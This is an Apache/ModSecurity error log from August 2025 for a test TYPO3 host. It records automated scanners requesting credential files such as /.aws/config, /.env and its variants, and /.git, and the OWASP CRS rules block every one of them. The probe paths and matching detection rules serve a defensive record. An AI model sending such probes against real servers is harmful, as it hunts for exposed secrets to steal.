[Tue Aug 12 02:35:30.835639 2025] [:error] [pid 1886708] [client 185.177.72.115:11054] [client 185.177.72.115] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aJqMUlKNv56PJ0ImEJn3DgAAAAs"]
[Tue Aug 12 02:35:30.835895 2025] [:error] [pid 1886708] [client 185.177.72.115:11054] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aJqMUlKNv56PJ0ImEJn3DgAAAAs"]
[Tue Aug 12 02:35:30.836110 2025] [:error] [pid 1886708] [client 185.177.72.115:11054] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aJqMUlKNv56PJ0ImEJn3DgAAAAs"]
[Wed Aug 13 06:49:01.132550 2025] [:error] [pid 1915763] [client 93.123.109.81:55300] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJwZPd_0TTE-3HOKQ8mTKQAAAAQ"]
[Wed Aug 13 06:49:01.132866 2025] [:error] [pid 1915763] [client 93.123.109.81:55300] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJwZPd_0TTE-3HOKQ8mTKQAAAAQ"]
[Wed Aug 13 06:49:01.133062 2025] [:error] [pid 1915763] [client 93.123.109.81:55300] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJwZPd_0TTE-3HOKQ8mTKQAAAAQ"]
[Wed Aug 13 06:49:01.274490 2025] [:error] [pid 1915760] [client 93.123.109.81:55304] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aJwZPexJjWGi7ODb_i9RZgAAAAE"]
[Wed Aug 13 06:49:01.274769 2025] [:error] [pid 1915760] [client 93.123.109.81:55304] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aJwZPexJjWGi7ODb_i9RZgAAAAE"]
[Wed Aug 13 06:49:01.274946 2025] [:error] [pid 1915760] [client 93.123.109.81:55304] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aJwZPexJjWGi7ODb_i9RZgAAAAE"]
[Wed Aug 13 06:49:01.379130 2025] [:error] [pid 1916116] [client 93.123.109.81:55318] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJwZPTXz3sVVxWT9PRVBdgAAAAY"]
[Wed Aug 13 06:49:01.379430 2025] [:error] [pid 1916116] [client 93.123.109.81:55318] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJwZPTXz3sVVxWT9PRVBdgAAAAY"]
[Wed Aug 13 06:49:01.379657 2025] [:error] [pid 1916116] [client 93.123.109.81:55318] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJwZPTXz3sVVxWT9PRVBdgAAAAY"]
[Wed Aug 13 06:49:01.499795 2025] [:error] [pid 1915761] [client 93.123.109.81:55322] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJwZPQ_JuZZsKPsvpklJowAAAAI"]
[Wed Aug 13 06:49:01.500049 2025] [:error] [pid 1915761] [client 93.123.109.81:55322] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJwZPQ_JuZZsKPsvpklJowAAAAI"]
[Wed Aug 13 06:49:01.500218 2025] [:error] [pid 1915761] [client 93.123.109.81:55322] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJwZPQ_JuZZsKPsvpklJowAAAAI"]
[Wed Aug 13 06:49:01.651642 2025] [:error] [pid 1915778] [client 93.123.109.81:55326] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aJwZPSOomHJoGtneOfUO5wAAAAU"]
[Wed Aug 13 06:49:01.651914 2025] [:error] [pid 1915778] [client 93.123.109.81:55326] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aJwZPSOomHJoGtneOfUO5wAAAAU"]
[Wed Aug 13 06:49:01.652131 2025] [:error] [pid 1915778] [client 93.123.109.81:55326] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aJwZPSOomHJoGtneOfUO5wAAAAU"]
[Wed Aug 13 06:49:01.750741 2025] [:error] [pid 1918619] [client 93.123.109.81:55340] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aJwZPQtxw1If3B--xdXHsAAAAAc"]
[Wed Aug 13 06:49:01.751018 2025] [:error] [pid 1918619] [client 93.123.109.81:55340] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aJwZPQtxw1If3B--xdXHsAAAAAc"]
[Wed Aug 13 06:49:01.751202 2025] [:error] [pid 1918619] [client 93.123.109.81:55340] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aJwZPQtxw1If3B--xdXHsAAAAAc"]
[Wed Aug 13 06:49:02.697703 2025] [:error] [pid 1916116] [client 93.123.109.81:55388] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJwZPjXz3sVVxWT9PRVBdwAAAAY"]
[Wed Aug 13 06:49:02.698091 2025] [:error] [pid 1916116] [client 93.123.109.81:55388] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJwZPjXz3sVVxWT9PRVBdwAAAAY"]
[Wed Aug 13 06:49:02.698336 2025] [:error] [pid 1916116] [client 93.123.109.81:55388] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJwZPjXz3sVVxWT9PRVBdwAAAAY"]
[Wed Aug 13 06:49:02.825485 2025] [:error] [pid 1915761] [client 93.123.109.81:55404] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJwZPg_JuZZsKPsvpklJpAAAAAI"]
[Wed Aug 13 06:49:02.825745 2025] [:error] [pid 1915761] [client 93.123.109.81:55404] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJwZPg_JuZZsKPsvpklJpAAAAAI"]
[Wed Aug 13 06:49:02.825939 2025] [:error] [pid 1915761] [client 93.123.109.81:55404] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJwZPg_JuZZsKPsvpklJpAAAAAI"]
[Wed Aug 13 06:49:02.909182 2025] [:error] [pid 1915778] [client 93.123.109.81:55406] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aJwZPiOomHJoGtneOfUO6AAAAAU"]
[Wed Aug 13 06:49:02.909432 2025] [:error] [pid 1915778] [client 93.123.109.81:55406] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aJwZPiOomHJoGtneOfUO6AAAAAU"]
[Wed Aug 13 06:49:02.909605 2025] [:error] [pid 1915778] [client 93.123.109.81:55406] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aJwZPiOomHJoGtneOfUO6AAAAAU"]
[Thu Aug 14 07:43:59.093550 2025] [authz_core:error] [pid 1940634] [client 36.70.97.106:55556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Aug 14 07:44:00.699282 2025] [authz_core:error] [pid 1941159] [client 36.70.97.106:65183] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Aug 18 11:46:00.458559 2025] [authz_core:error] [pid 2045457] [client 45.130.203.208:54121] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Aug 20 11:41:46.918188 2025] [:error] [pid 2093109] [client 195.178.110.15:45630] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aKWYWvjuVXgk8O3iqFjQFAAAAAc"]
[Wed Aug 20 11:41:46.920516 2025] [:error] [pid 2093109] [client 195.178.110.15:45630] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aKWYWvjuVXgk8O3iqFjQFAAAAAc"]
[Wed Aug 20 11:41:46.920686 2025] [:error] [pid 2093109] [client 195.178.110.15:45630] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aKWYWvjuVXgk8O3iqFjQFAAAAAc"]
[Wed Aug 20 11:41:47.174076 2025] [:error] [pid 2093108] [client 195.178.110.15:45644] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aKWYW32Gr5YpOjp9DyS0-gAAAAY"]
[Wed Aug 20 11:41:47.174362 2025] [:error] [pid 2093108] [client 195.178.110.15:45644] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aKWYW32Gr5YpOjp9DyS0-gAAAAY"]
[Wed Aug 20 11:41:47.174575 2025] [:error] [pid 2093108] [client 195.178.110.15:45644] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aKWYW32Gr5YpOjp9DyS0-gAAAAY"]
[Wed Aug 20 11:41:47.501400 2025] [:error] [pid 2091526] [client 195.178.110.15:45654] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aKWYW5V1zv2LpMhkc3xu6AAAAAM"]
[Wed Aug 20 11:41:47.501631 2025] [:error] [pid 2091526] [client 195.178.110.15:45654] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aKWYW5V1zv2LpMhkc3xu6AAAAAM"]
[Wed Aug 20 11:41:47.501786 2025] [:error] [pid 2091526] [client 195.178.110.15:45654] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aKWYW5V1zv2LpMhkc3xu6AAAAAM"]
[Wed Aug 20 11:41:47.664042 2025] [:error] [pid 2091524] [client 195.178.110.15:45668] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aKWYW1_S_YJC5elNsBVLLwAAAAE"]
